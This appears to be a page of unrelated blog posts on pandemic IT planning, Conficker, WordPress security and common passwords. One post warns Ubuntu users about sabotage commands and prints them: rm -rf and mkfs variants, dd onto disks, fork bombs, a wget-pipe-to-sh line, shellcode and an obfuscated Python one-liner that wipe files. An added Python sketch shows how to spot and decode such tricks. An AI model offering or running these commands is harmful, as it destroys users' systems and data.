We’ve been hearing from the CDC all over the news today about how the swine flu has hit Mexico and parts of the US and Canada very hard.  There is even some speculation as to whether or not this is the upcoming pandemic that we are long overdue for.

I thought that I would take this opportunity to put IT departments on alert so that they are prepared for the possibility of a swine flu pandemic or any other public health emergency.

Increased Strain

The most important factor that IT needs to realize is that in the time of a pandemic, there is going to be significant strain put upon both IT staff and IT resources. 

It will start out as an increase in Internet traffic as people at work start researching “swine flu” and “pandemic”. There will also be an increase in e-mail traffic, both from people e-mailing about the topic and from spammers attempting to capitalize on the scare.  This will happen before there is a pandemic or even any cases of swine flu in your immediate area.

Work From Home Requirements

If swine flu symptoms are discovered in your area, then the pressure will really start.  People will be urged to work from home.  This will put increased pressure on your Internet connection and also your VPN setup.  At this point, it becomes critical that you have a solid plan in place to provide remote access to the following network resources:

  • files
  • databases
  • e-mail
  • workstations
  • collaboration tools
  • intranet websites

From a support perspective, also make sure that you can perform the following tasks remotely:

  • reboot/troubleshoot servers
  • reconfigure any network component
  • access BIOS and POST on any server
  • access users’ home computers and network components
  • access workstations and laptops

When Disaster Strikes

But, no matter how hard you plan, something will go wrong.  It always does and someone will be required to go into your data center or server room.  If this occurs, you have two options for dealing with the situation:

  1. Co-ordinate with all other individuals who may need to be in the office and ensure that there are never two people there at the same time, or
  2. Have an IT person stock up for the long haul and spend his/her entire time at the data center, keeping everything running.

Option 2 is the best for maintaining everything and keeping it up and running.  This person can also act as a centralized contact point for getting non-digital information out to others.

Plan Now

While it is hard to say at this point whether or not we will be experiencing a pandemic, now is the time to plan for it, not later.  Make sure that you have a solid plan in place that will allow you to not only keep your company running but moving forward.  Some things to consider when planning for a pandemic:

  • Who will co-ordinate everything?
  • How will IT services be prioritized during this time? Who gets access to what first?
  • What will have to go on hold until the situation is resolved?
  • What critical outsourced services need to be running in order for your disaster plan to work? e.g. power, Internet
  • Do you have sufficient redundancy in your systems to ensure that you can keep moving forward with your business?
  • Create a list of critical employees that need to be given first priority for all things network.

Conclusion

I really hope that this is not one of those events that we see in disaster movies.  I really don’t.  But, if we do find ourselves in the middle of a public health emergency, it is important that the IT department be prepared.  How you respond to this situation could make or break your entire company.

If you found this post useful, why don't you buy me a cup of coffee to show your gratitude?

There are a number of unscrupulous people out there that are trying to, for whatever reason, get you to cause serious damage to your Ubuntu system.  They do this under the guise of helping you and they get you to type in these commands to “fix” your system.

I believe that knowledge is power. And I understand that this post could be used to teach people how to do this exact thing.  But I also believe that making people aware of these dangers is the best way to inoculate them.

Delete All Files in Directory and Directory Above

rm -rf /
rm -rf .
rm -rf *
rm -r .[^.]*

Reformat Devices

Any device named after the command will be reformatted and left blank.

mkfs
mkfs.ext3
mkfs.anything

Block Device Manipulation

Writes raw data to the device and often destroys it.

any_command > /dev/sda
dd if=something of=/dev/sda

Fork Bombs

Spawns a massive number of processes until the system locks up.

Bash:
:(){:|:&};:

Perl:
fork while fork

Tar Bomb

The archive extracts into a massive number of folders and files, potentially injecting files into the operating system.  This can make your system useless.

Decompression Bomb

You are asked to download a relatively small file which contains highly compressed data.  When extracted, it could take up gigs of data that may even fill up your entire hard drive and bring your system to a grinding halt.
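
As an added example (not part of the original post), this Python sketch reads an archive's headers before anything is extracted and flags the tar bomb and decompression bomb signs described above. The function names, the limits and the in-memory sample archives are assumptions constructed for illustration.

```python
import io
import tarfile
from pathlib import PurePosixPath

def inspect_tar(fileobj, max_members=10_000, max_total_bytes=1 << 30):
    """Read tar headers only (nothing is written to disk) and return warnings."""
    warnings, top_levels, count, total = [], set(), 0, 0
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:
            count += 1
            total += member.size  # bytes this entry occupies once extracted
            path = PurePosixPath(member.name)
            if path.is_absolute() or ".." in path.parts:
                warnings.append(f"escapes target directory: {member.name}")
            elif path.parts:
                top_levels.add(path.parts[0])
            if member.issym() or member.islnk():
                link = PurePosixPath(member.linkname)
                if link.is_absolute() or ".." in link.parts:
                    warnings.append(f"link points outside archive: {member.name}")
    # A well-behaved archive unpacks into one directory of its own.
    if len(top_levels) > 1:
        warnings.append(f"tar bomb: {len(top_levels)} top-level entries")
    if count > max_members:
        warnings.append(f"too many members: {count}")
    if total > max_total_bytes:
        warnings.append(f"expands to {total} bytes")
    return warnings

def build_sample(names, size=0):
    """Constructed sample: an in-memory .tar.gz with zero-filled members."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name in names:
            info = tarfile.TarInfo(name)
            info.size = size
            tar.addfile(info, io.BytesIO(b"\0" * size))
    buf.seek(0)
    return buf

if __name__ == "__main__":
    print(inspect_tar(build_sample(["a.txt", "b.txt", "../outside.txt"])))
    print(inspect_tar(build_sample(["data/zeros.bin"], size=2_000_000),
                      max_total_bytes=1_000_000))
```

If the list comes back empty, extract into a fresh, empty directory anyway so that stray files are easy to find and remove.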

Malicious Shell Scripts

You are asked to download and run a shell script that can contain any number of deadly commands.

wget http://some_place/some_file
sh ./some_file

wget http://some_place/some_file -O- | sh

Compiling Code

You are given, or asked to type in, source code which you then compile and run, wreaking havoc on your system.

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

This actually runs rm -rf ~ / & which destroys all the home directories!

Something similar in Python:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
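
Both snippets above can be decoded without running them. This added example (not from the original post or the Ubuntu Forums thread) reverses the character shift in the Python one-liner and the bit-inverted push instructions excerpted from the C array; the helper names are made up for illustration.

```python
def decode_shifted(text: str, shift: int = -1) -> str:
    """Undo the chr(ord(c) - 1) trick from the one-liner, without executing it."""
    return "".join(chr(ord(c) + shift) for c in text)

def hidden_pushes(code: bytes) -> str:
    """Recover a string built from 'push imm32' (0x68) words that are later
    bit-inverted in place (the f7 16 / f7 56 xx NOT instructions in the array)."""
    words = []
    for i in range(0, len(code), 5):
        if code[i] != 0x68:
            raise ValueError("expected a push imm32 opcode (0x68)")
        words.append(bytes(b ^ 0xFF for b in code[i + 1:i + 5]))
    # The stack grows downward, so the last word pushed comes first in memory.
    return b"".join(reversed(words)).split(b"\0")[0].decode("ascii")

# Excerpt of the C array above: the four consecutive push instructions only.
PUSHES = (b"\x68\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9"
          b"\x68\x8d\x99\xdf\x81\x68\x8d\x92\xdf\xd2")

# The obfuscated string from the Python one-liner above.
SHIFTED = "sn!.sg!+"

if __name__ == "__main__":
    print(repr(decode_shifted(SHIFTED)))
    print(repr(hidden_pushes(PUSHES)))
```

The readable cp/chmod string at the end of the C array is not what gets executed; the command is assembled from the inverted bytes, which is why reading the visible text of a snippet is not enough.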

Conclusion

So, if you are getting some help with your Ubuntu system, make sure you trust the person you are getting help from!

[Ubuntu Forums]


I recently found How to Firewall Your WordPress Blog to be useful. From the website:

You already know to use a decent password for your blog, but brute-force or dictionary attacks aren’t the only attacks used against bloggers. It’s much cheaper and faster to exploit software flaws, and that the hackers do. A programmer’s oversight may allow a hacker to gain access to your blog to insert spyware, adware, or links to various pharmaceuticals you’d prefer not to speak about in front of your mother.

And it’s not just WordPress proper. WordPress has caught some major criticism for its security holes — but lately it’s been a bunch of insecure plugins, not WordPress itself. Matt Mullenweg counters the argument that WordPress is insecure over here. I think he’s totally right — WordPress has a rich “plugin ecosystem” that no other blogging platform can touch.

However, the problem remains. WordPress has some great plugins that are written by people with the best of intentions — but who may not understand the importance of sanitizing data provided by untrusted users, and its relationship with security. Upgrading often, setting permissions, using good passwords, etc. — that all helps a lot — but unless you have the time and ability to painstakingly audit all program code for security vulnerabilities, you’d be best off running one of the WordPress firewalls —

Great!  Yet something else that needs to be done!  But would be well worth tackling!

[How to Firewall Your WordPress Blog]


Everyone is in full Chicken Little mode these days with April 1 just around the corner and the Conficker virus poised to bring down civilization.  Not since Y2K have I seen so much panic about a computer related issue.  So, to help everyone out, I thought that I would let you know how you can protect yourself from Conficker.

  1. Install the Microsoft patch - A patch for this issue has been available since October ‘08.  Make sure the patch is installed on your system.
  2. Update your antivirus software - Make sure that you have the latest version of your antivirus software and that the latest virus signatures are installed.  If you do not have antivirus on your computer, may I suggest Avast?
  3. Remove the worm from your system - F-Secure has a free tool that will remove it from your computer to make sure you are not a part of the robot army!  Or you can use the Microsoft version of the tool.
  4. Block the worm - I have created a HOSTS file update that can be added to the end of your HOSTS file to block the majority of the websites that the worm is attempting to connect to. (Thanks to F-Secure for the original file that I modified).  This can also be done from your DNS server if you are running a corporate network.

More Information

You can get more information about this worm at the following websites:

P.S. If you are interested in doing a bit of manhunting, Microsoft is apparently offering a reward of $250,000 to catch this virus maker!

P.P.S. How many Linux and Mac users are stressed about this?  That’s what I thought!


According to jimmyr.com, here are the 16 most common passwords:

  1. 123456, 123, 123123, 01234, 2468, 987654, etc
  2. 123abc, abc123, 246abc
  3. First Name
  4. Favorite Band
  5. Favorite Song
  6. first letter of given name then surname
  7. qwerty, asdf, and other keyboard rolls
  8. Favorite cartoon or movie character
  9. Favorite sport, or sports star
  10. Country of origin
  11. City of origin
  12. All numbers
  13. Some word in the dictionary
  14. Combining 2 dictionary words
  15. any of the above spelled backwards
  16. aaa, eee, llll, 999999, and other repeat combinations

Jimmy has also gotten his hands on a number of password lists and performed an analysis of the most common passwords.  A very interesting read.
